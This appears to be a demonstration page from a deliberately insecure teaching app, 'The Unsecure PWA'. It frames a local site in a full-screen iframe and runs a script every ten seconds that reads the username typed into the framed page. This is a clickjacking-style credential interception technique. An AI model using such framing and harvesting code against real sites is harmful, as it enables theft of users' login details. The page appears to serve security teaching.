<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Security-Policy" content="script-src http://*;" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <link rel="stylesheet" type="text/css" href="CSS/style.css" />
    <title>The Unsecure PWA</title>
    <link
      rel="icon"
      type="image/x-icon"
      href="http:\\127.0.0.1:5000\static\images\favicon.png"
    />
    <meta name="theme-color" content="#14E6DD" />
  </head>
  <body>
    <style>
      iframe {
        border: 0px;
        width: 100vw;
        height: 100vh;
      }
    </style>
    <iframe src="http://127.0.0.1:5000" id="myFrame"></iframe>
    <script>
      setTimeout(intercept, 10000);
      function intercept() {
        let iframe = document.getElementById("myFrame");
        let theirUsername =
          iframe.contentWindow.document.getElementById("username").value;
        console.log(theirUsername);
        setTimeout(intercept, 10000);
      }
    </script>
  </body>
</html>
